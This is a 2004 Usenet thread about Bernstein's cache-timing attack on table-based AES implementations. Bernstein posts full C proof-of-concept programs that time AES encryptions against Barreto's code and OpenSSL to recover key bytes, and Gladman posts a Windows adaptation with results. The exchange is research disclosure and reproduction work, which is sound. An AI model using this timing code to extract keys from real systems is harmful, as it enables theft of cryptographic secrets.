Don't use S-boxes!


D. J. Bernstein

unread,
Nov 11, 2004, 1:39:25 PM11/11/04
to
http://cr.yp.to/papers.html#cachetiming

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago

Arnaud Carré

unread,
Nov 11, 2004, 1:26:01 PM11/11/04
to

"D. J. Bernstein" <d...@cr.yp.to> a écrit dans le message de news:
slrncp7adr....@stoneport.math.uic.edu...
> http://cr.yp.to/papers.html#cachetiming

Oh!! I'm very happy to be one of the first reading such an awesome
affirmation :-)

I'm afraid it will re-activate the debate from a few threads ago about "RC4 is
not secure, AES is secure :-)"

Could you please detail what this changes "in practice" for AES users?

Arnaud


Tom St Denis

unread,
Nov 11, 2004, 3:38:22 PM11/11/04
to
D. J. Bernstein wrote:
> http://cr.yp.to/papers.html#cachetiming

I've implemented your algo and got

b = 0, loops = 1024 79 22 134 157 179 174 41 242 217 86
b = 1, loops = 1024 165 243 71 220 200 98 206 224 72 183
b = 2, loops = 1024 136 249 77 147 238 75 78 126 208 206
b = 3, loops = 1024 173 175 61 19 141 173 203 161 114 223
b = 4, loops = 1024 219 111 39 202 206 100 129 119 10 60
b = 5, loops = 1024 64 92 163 92 144 21 154 136 131 23
b = 6, loops = 1024 218 147 228 193 232 97 60 229 228 229
b = 7, loops = 1024 6 129 81 224 108 145 44 252 32 140
b = 8, loops = 1024 190 16 30 211 238 64 235 231 29 76
b = 9, loops = 1024 211 47 71 78 87 63 67 18 40 181
b = 10, loops = 1024 232 107 14 55 158 68 234 253 86 192
b = 11, loops = 1024 31 143 206 106 47 126 159 177 54 110
b = 12, loops = 1024 234 114 124 22 217 162 203 189 145 62
b = 13, loops = 1024 208 72 100 200 119 78 34 123 144 130
b = 14, loops = 1024 134 250 191 171 186 208 151 4 197 33
b = 15, loops = 1024 215 158 18 58 208 43 81 208 180 143

On my AMD64 using LTC 0.99.

In particular for the noted bytes 1, 5, 9 it seems only that byte 5
really shows a "bias" of having 92 appear twice [probability iicc is
roughly 43.61/65536 or 0.000665479]

I don't quite get what you are trying to prove by this table [which
totally doesn't agree with your results]. A byte value that takes the
longest means what? There are 10 rounds in AES-128 and changing that
one byte will cause a difference in ALL 16 bytes after the second round
[compared to any other in the set].

I have put my source tarball for the demo at

http://libtomcrypt.org/djaes.tar.bz2

So far my initial assessment is the "bias" doesn't actually work or
isn't very practical.

Some things to note about my setup:

- Running Gentoo Linux on an 2.2Ghz AMD64
- Used GCC 3.4.2-r1
- Had gaim, xmms, mozilla, Xdvi, Apache2, sshd, Gnome and applets running
- Linked in LibTomCrypt 0.99 [with patchset 001] using the shared object

Maybe if I shut down all active processes and unniced it it would work
better who knows...

Tom

Tom St Denis

unread,
Nov 11, 2004, 3:40:02 PM11/11/04
to
Arnaud Carré wrote:
> "D. J. Bernstein" <d...@cr.yp.to> a écrit dans le message de news:
> slrncp7adr....@stoneport.math.uic.edu...
>
>>http://cr.yp.to/papers.html#cachetiming
>
>
> Oh!! I'm very happy to be one of the first reading such an awesome
> affirmation :-)

Question. Did you actually test his claim first?

> I'm afraid it will re-activate the debate from a few threads ago about "RC4 is not
> secure, AES is secure :-)"

RC4 *isn't* secure. If DJ is right then AES is not secure either.

One doesn't influence the other.

> Could you please detail what this changes "in practice" for AES users?

Depends on whether others can confirm the results. So far on my AMD64 it
doesn't work.

[Note: this isn't the first "break" of AES that didn't work and I doubt
it will be the last. Not to say that people trying is bad. Quite the
opposite, it's good. Just jumping on the bandwagon without checking it out
is bad.]

Tom

Tom St Denis

unread,
Nov 11, 2004, 3:57:31 PM11/11/04
to
Tom St Denis wrote:
> I have put my source tarball for the demo at
>
> http://libtomcrypt.org/djaes.tar.bz2
>
> So far my initial assessment is the "bias" doesn't actually work or
> isn't very practical.

Some other comments about the paper

- Salsa10 isn't a block cipher so comparing it to AES is meaningless
- << and >> are **not** "cheap" timing-independent operations on 8-bit CPUs
- He cites xtea/helix/sha256 as secure designs but doesn't prove or cite
proofs for this claim
- He fails to prove or state what Salsa10 is secure against

...

Tom

BRG

unread,
Nov 11, 2004, 4:12:26 PM11/11/04
to
Tom St Denis wrote:

> Arnaud Carré wrote:
>
>> "D. J. Bernstein" <d...@cr.yp.to> a écrit dans le message de news:
>> slrncp7adr....@stoneport.math.uic.edu...
>>
>>> http://cr.yp.to/papers.html#cachetiming
>>
>> Oh!! I'm very happy to be one of the first reading such an awesome
>> affirmation :-)
>
>
> Question. Did you actually test his claim first?
>
>> I'm afraid it will re-activate the debate from a few threads ago about "RC4 is
>> not secure, AES is secure :-)"
>
>
> RC4 *isn't* secure. If DJ is right then AES is not secure either.

If I am reading this correctly, his claim is not that AES is insecure
but rather that particular _implementations_ of AES might be insecure
because they might leak key bits when subject to timing attacks.

Brian Gladman

D. J. Bernstein

unread,
Nov 11, 2004, 5:48:47 PM11/11/04
to
BRG wrote:
> If I am reading this correctly, his claim is not that AES is insecure
> but rather that particular _implementations_ of AES might be insecure
> because they might leak key bits when subject to timing attacks.

More than that: I'm saying that _typical_ software implementations of
AES _do_ leak key bits to the simplest conceivable timing attack. The
underlying problem is that it's hard to do an S-box lookup in constant
time on modern CPUs.
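
For illustration only (a sketch of the idea, not code from the paper): the
straightforward way to make a 256-entry lookup independent of the cache
state is to read every entry and keep the wanted one with a mask, which is
exactly why constant-time lookups are so expensive.

#include <stdint.h>

/* illustrative sketch: read every entry of the table so the memory access
   pattern never depends on the secret index, and keep only the wanted
   byte with a mask */
uint8_t ct_lookup(const uint8_t table[256], uint8_t idx)
{
  uint8_t r = 0;
  unsigned i;
  for (i = 0;i < 256;++i) {
    /* mask is 0xff when i == idx, 0x00 otherwise, with no branch */
    uint8_t mask = (uint8_t)((((unsigned)(i ^ idx)) - 1) >> 8);
    r |= table[i] & mask;
  }
  return r;
}

AES-128 does 16 S-box (or table) lookups per round for 10 rounds, so the
cost of doing each lookup this way adds up quickly.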

BRG

unread,
Nov 11, 2004, 5:13:08 PM11/11/04
to
Tom St Denis wrote:

I also did this separately and we seem to agree on what is involved.

I don't see the effect described in the paper either.

Brian Gladman

Tom St Denis

unread,
Nov 11, 2004, 6:00:25 PM11/11/04
to
D. J. Bernstein wrote:
> BRG wrote:
>
>>If I am reading this correctly, his claim is not that AES is insecure
>>but rather that particular _implementations_ of AES might be insecure
>>because they might leak key bits when subject to timing attacks.
>
>
> More than that: I'm saying that _typical_ software implementations of
> AES _do_ leak key bits to the simplest conceivable timing attack. The
> underlying problem is that it's hard to do an S-box lookup in constant
> time on modern CPUs.

I don't see the attack as being practical and here is why.

Say you do two encryptions where you toggle byte k of the input [for
AES]. In round three, all bytes MUST be different between the two
16-byte blocks. It's then more plausible that they will "scatter"
throughout cache usage because all 16 bytes will now access different
parts of their respective 1kb arrays [though they could be on the same
page].

Also AES only requires 4KB of cache, which is likely to be in L1 or L2
because the tables are adjacent. I'd hazard a guess that in most crypto
implementations on a CPU with enough cache for the OS + buffers + AES,
you're likely not to have that many cache misses after the first
few thousand blocks.

Not only that but you don't know when the cache miss occurs. Doesn't
tell you much about which lookups actually missed [because of the change
in input].

The fact that neither Brian nor I can reproduce the results doesn't bode
well for the attack. Perhaps you could post the source code that you
ran, and we can check whether we implemented it wrong or you described it
wrong?

Tom

BRG

unread,
Nov 11, 2004, 6:01:14 PM11/11/04
to
D. J. Bernstein wrote:
> BRG wrote:
>
>>If I am reading this correctly, his claim is not that AES is insecure
>>but rather that particular _implementations_ of AES might be insecure
>>because they might leak key bits when subject to timing attacks.
>
> More than that: I'm saying that _typical_ software implementations of
> AES _do_ leak key bits to the simplest conceivable timing attack. The
> underlying problem is that it's hard to do an S-box lookup in constant
> time on modern CPUs.

Yes, I agree that your claims are much wider than my comment here suggested.

But my aim in making a response to what Tom said was not to comment on
these wider issues but simply to avoid any suggestion that you are
claiming that the AES _algorithm_ is insecure when considered at an
abstract level.

Brian Gladman

Tom St Denis

unread,
Nov 11, 2004, 6:11:46 PM11/11/04
to

My AES code was derived from the PD code by the Rijndael team that most
other sources use [GPG for instance uses it]. So unless D.J. found a
significantly new way to implement AES I suspect that he too uses the
same style implementation.

Also if his intention was to suggest that implementations ought to
tighten up then why would he propose Salsa10 as a "new methodology"?

I'm forming my own opinions on his motivations but I'll wait to see if
he'll post his test code before sharing them :-)

Tom

BRG

unread,
Nov 11, 2004, 6:29:55 PM11/11/04
to
Tom St Denis wrote:

> BRG wrote:
>
>> D. J. Bernstein wrote:
>>

[snip]


> My AES code was derived from the PD code by the Rijndael team that most
> other sources use [GPG for instance uses it]. So unless D.J. found a
> significantly new way to implement AES I suspect that he too uses the
> same style implementation.

I have now run the tests using Paulo Barreto's AES code (this code was
used by DJB) as well as my own. I have done this on both Intel P3 and
P4 systems and cannot reproduce the results.

> Also if his intention was to suggest that implementations ought to
> tighten up then why would he propose Salsa10 as a "new methodology"?
>
> I'm forming my own opinions on his motivations but I'll wait to see if
> he'll post his test code before sharing them :-)

I remain to be convinced that this is as serious as DJB is suggesting.

Brian Gladman

D. J. Bernstein

unread,
Nov 11, 2004, 7:28:52 PM11/11/04
to
Brian Gladman wrote:
> I have now run the tests using Paulo Barreto's AES code (this code was
> used by DJB) as well as my own. I have done this on both Intel P3 and
> P4 systems and cannot reproduce the results.

Perhaps your variable alignments were lucky and avoided any overlaps in
the L1 cache; this won't happen in a large cryptographic program but it
could happen in a small test program. The more basic point is that the
timings depend heavily on the exact program you use, the compiler, and
the CPU.

Here's an example of 24 key bits leaking to the same trivial timing
attack in a few seconds on a Pentium M. I took Barreto's code, made an
easy translation from C++ to C, and ran

gcc -o time time.c barreto.c -O2
./time < /dev/urandom

with gcc 2.95.4 under FreeBSD 4.10. Output excerpt:

0, 64 loops: 114 10 83 65 235 62 76 144 65 8 200 37 35 14 150 39
1, 64 loops: 139 166 138 2 96 216 189 169 169 125 55 218 84 94 42 72
2, 64 loops: 127 96 211 151 186 194 194 202 237 252 251 102 200 127 31 39
3, 64 loops: 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76
4, 64 loops: 156 40 14 13 77 174 249 86 120 170 205 160 159 226 39 16
5, 64 loops: 24 189 115 81 106 101 108 107 50 199 25 240 168 85 49 156
6, 64 loops: 245 30 229 163 236 172 75 205 141 42 133 150 42 235 37 43
7, 64 loops: 79 105 173 50 201 79 38 14 115 192 43 40 222 175 52 26
8, 64 loops: 158 132 69 14 101 145 114 203 173 150 245 37 173 138 145 115
9, 64 loops: 127 94 80 118 234 15 199 197 86 80 122 51 36 23 59 45
10, 64 loops: 234 216 130 220 147 184 114 215 104 129 201 58 104 209 11 233
11, 64 loops: 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75
12, 64 loops: 110 102 182 214 82 202 109 108 133 94 37 95 66 158 152 66
13, 64 loops: 233 152 14 158 36 30 133 127 28 145 42 105 238 3 88 70
14, 64 loops: 150 7 2 142 47 142 17 117 58 96 208 34 113 191 231 183
15, 64 loops: 73 73 73 73 73 73 73 73 73 73 73 73 73 73 73 73

The time.c program is shown below.

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago


#include <stdio.h>

typedef struct { unsigned long t[2]; } timing;
#define timing_now(x) \
asm volatile(".byte 15;.byte 49" : "=a"((x)->t[0]),"=d"((x)->t[1]))
#define timing_diff(x,y) \
(((x)->t[0] - (double) (y)->t[0]) \
+ 4294967296.0 * ((x)->t[1] - (double) (y)->t[1]))

unsigned char expanded[176];
unsigned char out[16];
unsigned char key[16];
unsigned char in[16];

int cycles(void)
{
timing tstart;
timing tend;
int t;
do {
timing_now(&tstart);
aes_encrypt(out,in,expanded);
timing_now(&tend);
t = timing_diff(&tend,&tstart);
} while (t <= 0 || t >= 1500);
return t;
}

int loops = 1;

int bump(int b)
{
int i;
int j;
int x;
int xt;
int bestx;
int bestxt = 0;

for (x = 0;x < 256;++x) {
xt = 0;
for (i = 0;i < loops;++i) {
for (j = 0;j < 16;++j) in[j] = random() >> 16;
in[b] = x;
xt += cycles() + cycles() + cycles();
}
if (xt > bestxt) {
bestx = x;
bestxt = xt;
}
}
return bestx;
}

main()
{
int j;
int k;
int b;

for (loops = 4;loops <= 65536;loops *= 2) {
for (b = 0;b < 16;++b) {
printf("%d, %d loops:",b,loops);
for (k = 0;k < 16;++k) {
for (j = 0;j < 16;++j) key[j] = getchar();
aes_expand(expanded,key);
printf(" %d",bump(b) ^ key[b]);
fflush(stdout);
}
printf("\n");
}
}

return 0;
}

Skybuck Flying

unread,
Nov 11, 2004, 7:24:34 PM11/11/04
to
Ok,

I am just a "random" programmer...

How much of a concern is this ?

I mean windows is multi threaded... all kinds of events happen all the time.

Doesn't this completely throw off all timings ?

Aside from that..... let's look at the following scenario:

Computer 1 <-> Middle Man <-> Computer 2.

Now you're the middle man...

You don't know what kind of hardware computer 1 and computer 2 are using...

Even if you did know, you have no access to their timing etc...

How could you possibly "crack" any protocol that is being used to
communicate between Computer 1, Computer 2 and you in between lol.

I don't see it ;)

Can you ?

Bye,
Skybuck.


D. J. Bernstein

unread,
Nov 11, 2004, 7:58:10 PM11/11/04
to
Skybuck Flying wrote:
> I mean windows is multi threaded... all kinds of events happen all the time.
> Doesn't this completely throw off all timings ?

No. It adds a random-looking delay to some of the timings. The attacker
can simply ignore the unusually long timings. The attacker can also take
advantage of the delays to gain information about cache misses inserted
into the middle of the AES computation; this requires averaging over a
large number of timings, but it's doable.
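
For illustration (a sketch only, not code from the paper; cycles() stands
for one timed AES call like the helper in the time.c I posted earlier):

extern int cycles(void); /* one timed AES_k(n) call, as in the earlier time.c */

/* illustrative only: time the same encryption many times, drop the
   unusually long samples (context switches, interrupts, etc.), and
   average the rest */
double filtered_average(int samples)
{
  double sum = 0.0;
  int kept = 0;
  int i;
  for (i = 0;i < samples;++i) {
    int t = cycles();
    if (t < 1500) { sum += t; ++kept; }
  }
  return kept ? sum / kept : 0.0;
}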

> How could you possibly "crack" any protocol that is being used to
> communicate between Computer 1, Computer 2 and you in between lol.

My paper cites the Brumley-Boneh paper ``Remote timing attacks are
practical,'' which you obviously need to read.

Skybuck Flying

unread,
Nov 11, 2004, 8:56:40 PM11/11/04
to

"D. J. Bernstein" <d...@cr.yp.to> wrote in message
news:slrncp80jv....@stoneport.math.uic.edu...

> Skybuck Flying wrote:
> > I mean windows is multi threaded... all kinds of events happen all the
> > time.
> > Doesn't this completely throw off all timings ?
>
> No. It adds a random-looking delay to some of the timings. The attacker
> can simply ignore the unusually long timings. The attacker can also take
> advantage of the delays to gain information about cache misses inserted
> into the middle of the AES computation; this requires averaging over a
> large number of timings, but it's doable.
>
> > How could you possibly "crack" any protocol that is being used to
> > communicate between Computer 1, Computer 2 and you in between lol.
>
> My paper cites the Brumley-Boneh paper ``Remote timing attacks are
> practical,'' which you obviously need to read.

Do you happen to have a link to a PDF document or HTML file?

Bye,
Skybuck.


D. J. Bernstein

unread,
Nov 11, 2004, 10:28:08 PM11/11/04
to
Tom St Denis wrote:
> A byte value that takes the longest means what?

Often it tells you the corresponding key byte, because---for example---
the xor of those bytes, which is used as a round-1 S-box index, incurs
an L1 cache miss. If you know how the cache works and where the program
stores its variables, you can figure out which xor values will trigger
this behavior; or you can see the values from a trivial test, as I did.
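
A minimal sketch of that last step (the names are illustrative, not part of
the test program): the round-1 table index for byte b is in[b] xor k[b], so
if some index value v is consistently slow on the target setup, the x that
maximizes the timing satisfies x xor k[b] = v.

/* illustrative only: v is the machine- and compiler-specific "slow" round-1
   index, learned once by running the same test on an identical setup with a
   known key; slowest_x is the byte value that maximizes the victim's timings */
unsigned char recover_keybyte(unsigned char slowest_x, unsigned char v)
{
  return slowest_x ^ v;
}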

D. J. Bernstein

unread,
Nov 12, 2004, 1:13:30 AM11/12/04
to
Here's another example. The same easy timing attack, applied to OpenSSL
under FreeBSD 4.10 on a Pentium M, immediately finds 24 AES key bits:

% gcc -o time time.c -lssl -lcrypto -O2
% ./time < /dev/urandom
...
2, 32 loops: 98 98 98 98 98 98 98 98 98 98 85 98 98 98 98 98
...
10, 32 loops: 94 94 94 94 94 94 94 94 94 93 94 93 94 94 94 94
...
14, 32 loops: 217 85 85 85 85 85 85 85 85 85 85 85 85 85 85 85

The 98, 94, and 85 are rock-solid at 64 loops. As an example of compiler
dependence, omitting -O2 changes the constants to 86, 97, and 93.
Anyway, the complete time.c code appears below.

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago


#include <stdio.h>
#include <openssl/aes.h>

typedef struct { unsigned long t[2]; } timing;
#define timing_now(x) \
asm volatile(".byte 15;.byte 49" : "=a"((x)->t[0]),"=d"((x)->t[1]))
#define timing_diff(x,y) \
(((x)->t[0] - (double) (y)->t[0]) \
+ 4294967296.0 * ((x)->t[1] - (double) (y)->t[1]))

AES_KEY expanded;


unsigned char out[16];
unsigned char key[16];
unsigned char in[16];

int cycles(void)
{
timing tstart;
timing tend;
int t;
do {
timing_now(&tstart);

AES_encrypt(in,out,&expanded);

int loops = 1;

AES_set_encrypt_key(key,128,&expanded);

D. J. Bernstein

unread,
Nov 12, 2004, 1:24:56 AM11/12/04
to
Brian Gladman writes:
> But my aim in making a response to what Tom said was not to comment on
> these wider issues but simply to avoid any suggestion that you are
> claiming that the AES _algorithm_ is insecure when considered at an
> abstract level.

Right. An AES oracle---a magic box that, given n, prints AES_k(n)
exactly one time step later---is, as far as we know, indistinguishable
from an oracle for a uniform random permutation.

The problem is that real-world S-box lookups don't take constant time,
so real-world AES software doesn't take exactly one time step.

D. J. Bernstein

unread,
Nov 12, 2004, 1:36:54 AM11/12/04
to
Tom St Denis wrote:
> Also if his intention was to suggest that implementations ought to
> tighten up

The paper spends a couple of pages explaining how expensive it is to
avoid the four most obvious sources of variability in S-box timing. If
you ever manage to write an AES implementation that doesn't have
input-dependent timings, feel free to tell us exactly how slow it is.

> then why would he propose Salsa10 as a "new methodology"?

I didn't call it a ``new methodology.'' In fact, I said quite clearly
that it follows TEA and SHA-256 and Helix. Of course, the 64-byte output
is different, and various details are different; the objective, as
usual, is to find the highest-speed system that we can still reasonably
conjecture to be unbreakable.

John Savard

unread,
Nov 12, 2004, 2:15:13 AM11/12/04
to
On Fri, 12 Nov 2004 03:28:08 +0000 (UTC), "D. J. Bernstein"
<d...@cr.yp.to> wrote, in part:

>Tom St Denis wrote:
>> A byte value that takes the longest means what?
>
>Often it tells you the corresponding key byte, because---for example---
>the xor of those bytes, which is used as a round-1 S-box index, incurs
>an L1 cache miss. If you know how the cache works and where the program
>stores its variables, you can figure out which xor values will trigger
>this behavior; or you can see the values from a trivial test, as I did.

I can see that S-boxes do have a potential of allowing side attacks,
given what you say here, although in some applications the attacker
doesn't have this opportunity, and only sees the enciphered messages.

But not using S-boxes, and depending entirely on functions that can be
calculated quickly, is very likely to create cryptanalytically
exploitable weaknesses in ciphers.

Security is not enhanced if so many conditions are set on what
constitutes an acceptable cipher that it becomes too difficult for
anyone ever to design one that is secure. If ciphers are only designed
for us by the high priests of mathematics, then we are forced to trust
them.

The first rule of security is to trust no one.

For some purposes, a cipher is needed that resists all side attacks. For
others, this is not a requirement. As long as the restrictions applying
to each class of cipher are recognized, a toolkit for the construction
of basic class ciphers by people wishing to communicate by E-mail,
concerned only about distant eavesdroppers, so that they can construct
their very own cipher, may serve a purpose.

Finding ciphers using just multiplication for nonlinearity is also a
valid pursuit, because applications exist requiring side attack
resistance. But the idea that there should only be one cipher, and it
should be all things to all men, is not a good one; Terry Ritter made
valid points about the dangers of staying with the herd (although the
dangers of going too far astray, and using a cipher about whose security
nothing is known, are also valid).

John Savard
http://home.ecn.ab.ca/~jsavard/index.html

BRG

unread,
Nov 12, 2004, 5:34:16 AM11/12/04
to
D. J. Bernstein wrote:

> Here's another example. The same easy timing attack, applied to OpenSSL
> under FreeBSD 4.10 on a Pentium M, immediately finds 24 AES key bits:
>
> % gcc -o time time.c -lssl -lcrypto -O2
> % ./time < /dev/urandom
> ...
> 2, 32 loops: 98 98 98 98 98 98 98 98 98 98 85 98 98 98 98 98
> ...
> 10, 32 loops: 94 94 94 94 94 94 94 94 94 93 94 93 94 94 94 94
> ...
> 14, 32 loops: 217 85 85 85 85 85 85 85 85 85 85 85 85 85 85 85
>
> The 98, 94, and 85 are rock-solid at 64 loops. As an example of compiler
> dependence, omitting -O2 changes the constants to 86, 97, and 93.
> Anyway, the complete time.c code appears below.

Thank you for the code. I have had to modify this for Windows and
Microsoft VC++ (7.1) and my revision is included below for those who
might want to try this out.

After trying various combinations of AES tables I have not been able to
obtain any effects on either Intel P4 or VIA C3 processors.

But I have now found combinations of tables (using my AES code) that do
demonstrate the effect on the Intel P3 processor. Here is one P3 result
(the far right hand value is the duplicate count from 16 samples):

08, 00004 loops : 14 18 1f 37 3a 45 4d 4d 65 7c 8f a3 c8 e7 eb f7
11, 00004 loops : 18 18 22 3a 3a 3a 3a 3a 3a 41 48 84 ae c5 d7 e8 6
12, 00004 loops : 1d 1d 27 37 38 3b 3d 5e 5e 91 a2 ac b0 bd ce d4
01, 00008 loops : 2a 49 49 4b 74 77 7d 8d 91 9d 9f a8 da db f7 fb
05, 00008 loops : 07 2c 3c 46 51 58 5a 77 79 92 92 9e cd ec fc fe
08, 00008 loops : 03 13 17 17 2e 46 69 6c 76 80 8f 95 b3 e2 e6 f6
10, 00008 loops : 0f 10 16 33 3a 45 52 72 72 86 9c a3 c8 d5 f5 fa
11, 00008 loops : 3a 3a 40 68 81 9c a8 b6 c9 cf d0 d9 da ea ea f5
12, 00008 loops : 31 3c 4d 7e 81 90 99 a2 b4 b4 c5 c6 c8 c8 d1 ec
00, 00016 loops : 13 14 26 2a 37 48 52 6a 76 92 b5 c4 d6 fa fb fb
01, 00016 loops : 08 0c 2f 32 33 3e 4c 52 52 62 65 8e 9b aa ae ec
03, 00016 loops : 07 3c 47 55 67 68 7c 9c a1 d1 d6 ed f2 f8 f8 fa
04, 00016 loops : 05 05 05 0c 14 18 25 29 45 48 49 59 81 96 b0 c2 3
11, 00016 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 67 9c c6 f7 12
13, 00016 loops : 0a 69 69 6b 73 78 8e a2 af b4 bd c6 d2 dd ee ef
15, 00016 loops : 19 2e 35 3e 3e 44 46 52 8f 90 a2 b3 c4 e7 ed f0
01, 00032 loops : 1e 40 54 57 5d 6d a6 a7 b4 b8 b8 d5 d9 ee f0 fe
06, 00032 loops : 09 17 31 46 52 72 78 96 97 a2 b7 df e0 e0 ef fb
11, 00032 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 63 74 a0 bd d6 11
15, 00032 loops : 0e 1b 2c 35 3e 3e 3e 3e 59 63 77 83 88 94 b5 df 4
01, 00064 loops : 5e 6a 7e 7f 85 86 8b 8f 9f 9f a2 a5 d5 d9 df f7
07, 00064 loops : 05 10 15 17 2d 5f 6f 71 8b 91 ba c3 d4 ef ef fd
11, 00064 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 7e c1 c4 13
12, 00064 loops : 18 19 19 34 34 37 58 58 85 a3 a5 af ce dc df ee
15, 00064 loops : 0f 1c 24 31 3e 3e 3e 3e 56 63 65 7a 80 8e de e3 4
00, 00128 loops : 00 1b 21 45 4d 5c 60 84 96 9e 9e a6 bc cd db f7
01, 00128 loops : 0a 21 62 72 7d 8d 8d 8f 93 af b0 c5 d8 e1 e2 fc
02, 00128 loops : 01 2b 33 37 49 4a 4e 50 53 93 a0 dc ea ea ed f2
03, 00128 loops : 08 18 19 1b 24 2e 31 3a 3d 50 5e 85 ad c9 f8 f8
06, 00128 loops : 26 26 2a 37 59 5c 7c 7e a0 ba c5 c8 e2 e6 f1 fa
07, 00128 loops : 2e 37 4b 5d 70 72 75 87 9e a5 bd c5 c5 d8 e7 fe
09, 00128 loops : 2b 33 4b 4b 53 54 59 5f 70 70 92 94 97 98 af f9
10, 00128 loops : 2d 2e 4e 53 60 64 8d 91 a1 a1 b3 c2 e0 ed f9 ff
11, 00128 loops : 0e 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 8f bf c0 12
14, 00128 loops : 05 05 08 3b 4f 5d 69 6a 7a 8c ab cc ef ef f0 f8
15, 00128 loops : 07 13 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 8d 98 e4 f4 10
03, 00256 loops : 36 40 51 6b 75 8b 8b 98 a1 ac b5 e6 ec f3 fa fc
04, 00256 loops : 0a 16 30 50 65 6f 71 79 94 a2 a6 d2 d2 db e5 fd
05, 00256 loops : 02 08 17 17 1d 42 50 6a 84 c6 d8 dc e5 f6 f8 f9
06, 00256 loops : 1e 22 2c 44 51 5a 64 87 8b 9e a0 a0 b0 bc e3 ff
09, 00256 loops : 25 27 27 58 5c 84 9b 9f a9 de e2 e8 ee f2 f7 fa
11, 00256 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 5c 96 96 13
13, 00256 loops : 02 30 46 49 4e 58 7a 7e 89 95 a1 a3 a3 b0 dc ef
14, 00256 loops : 2c 32 32 3c 3d 4b 61 8b 92 b1 c2 e0 e9 eb ed ef
15, 00256 loops : 2f 3d 3e 3e 3e 3e 3e 3e 3e 3e 3e 6e 74 c6 e2 ea 9
02, 00512 loops : 04 11 38 65 70 75 7e 97 a5 ba ba dc dd e6 fd fe
04, 00512 loops : 0e 0e 38 44 56 66 67 6b 80 a9 aa bd bd ca d4 d7
05, 00512 loops : 01 3b 46 4b 59 66 6f 84 85 89 99 be c6 c7 d5 d5
08, 00512 loops : 07 18 1c 27 27 2a 4a 4b 64 72 8b 93 aa d4 e1 e5
11, 00512 loops : 11 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 67 14
14, 00512 loops : 1c 29 2f 4f 5c 60 6c 7c 83 83 a0 a5 c3 dd f4 f8
15, 00512 loops : 22 34 36 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 73 9b b5 10

Brian Gladman

-------------------------------------
/* Based on D. J. Bernstein's Timing Attack Code modified for
Brian Gladman's AES code and Microsoft VC++ version 7.1
*/

#include <stdio.h>
#include <stdlib.h>
#include "aes.h"

/* obtain cycle counts using the Time Stamp Counter */
#define timing_now(x) \
__asm rdtsc __asm lea ebx,x __asm mov [ebx],eax __asm mov [ebx+4],edx
#define timing_diff(x,y) (int)(x - y)

#define N_SAMPLES 16


unsigned char out[16];
unsigned char key[16];
unsigned char in[16];

aes_encrypt_ctx ctx[1];

/* Simple PRNG combining 2 of George Marsaglia's generators */
unsigned long rand32(void)
{ static unsigned long w = 521288629, z = 362436069;
z = 36969 * (z & 65535) + (z >> 16);
w = 18000 * (w & 65535) + (w >> 16);
return (z << 16) + w;
}

unsigned char rand8(void)
{ static unsigned long r4, cnt = 4;
if(cnt == 4)
r4 = rand32(), cnt = 0;
return (unsigned char)(r4 >> 8 * cnt++);
}

int cycles(void)
{ unsigned long long tstart, tend;
int t;
do
{ timing_now(tstart);
aes_encrypt(in, out, ctx);
timing_now(tend);
t = timing_diff(tend, tstart);


}
while
(t <= 0 || t >= 1500);
return t;
}

int bump(int b, int loops)
{ int i, j, x, xt, bestx, bestxt = 0;

for(x = 0; x < 256; ++x)
{ xt = 0;
for(i = 0; i < loops; ++i)
{
for(j = 0; j < 16; ++j)
in[j] = rand8();


in[b] = x;
xt += cycles() + cycles() + cycles();
}

if(xt > bestxt)


{
bestx = x; bestxt = xt;
}
}
return bestx;
}

int cmp(const unsigned char* a, const unsigned char* b)
{
return *a < *b ? -1 : *a > *b ? 1 : 0;
}

int main(void)
{ int i, j, k, b, loops, cnt;
unsigned char v[16];

for(loops = 4; loops <= 65536; loops += loops)
{ for(b = 0; b < 16; ++b)
{ for(k = 0; k < N_SAMPLES; ++k)
{ for(j = 0; j < 16; ++j)
key[j] = rand8();
aes_encrypt_key(key, 16, ctx);
v[k] = bump(b, loops) ^ key[b];
}

qsort(v, N_SAMPLES, sizeof(unsigned char), cmp);
j = 0; cnt = 0;
do
{ if(v[j] == v[j + 1])
{ k = j;
while(++j < N_SAMPLES && v[j] == v[k])
;
cnt = (j - k > cnt ? j - k : cnt);
--j;
}
}
while
(++j < N_SAMPLES);

if(cnt > 1)
{ printf("\n%02d, %05d loops :", b, loops);
for(i = 0; i < N_SAMPLES; ++i)
printf(" %02x", v[i]);
if(cnt > 2)
printf(" %2d", cnt);
fflush(stdout);
}
}
}
return 0;
}

Tom St Denis

unread,
Nov 12, 2004, 8:10:41 AM11/12/04
to
BRG wrote:
> D. J. Bernstein wrote:
>
>> Here's another example. The same easy timing attack, applied to OpenSSL
>> under FreeBSD 4.10 on a Pentium M, immediately finds 24 AES key bits:
>>
>> % gcc -o time time.c -lssl -lcrypto -O2
>> % ./time < /dev/urandom
>> ...
>> 2, 32 loops: 98 98 98 98 98 98 98 98 98 98 85 98 98 98 98 98
>> ...
>> 10, 32 loops: 94 94 94 94 94 94 94 94 94 93 94 93 94 94 94 94
>> ...
>> 14, 32 loops: 217 85 85 85 85 85 85 85 85 85 85 85 85 85 85 85
>>
>> The 98, 94, and 85 are rock-solid at 64 loops. As an example of compiler
>> dependence, omitting -O2 changes the constants to 86, 97, and 93.
>> Anyway, the complete time.c code appears below.
>
>
> Thank you for the code. I have had to modify this for Windows and
> Microsoft VC++ (7.1) and my revision is included below for those who
> might want to try this out.
>
> After trying various combinations of AES tables I have not been able to
> obtain any effects on either Intel P4 or VIA C3 processors.

I found a string of "243" with his code [slightly modified to be more
x86 portable asm...] in byte 1, but when I put in my rdtsc function
[from my djaes code] I got strings of 245. So clearly what value that
pops out is dependent on the analysis software cuz both can't be right.

So the question now is why doesn't my AES code leak bytes too? My code
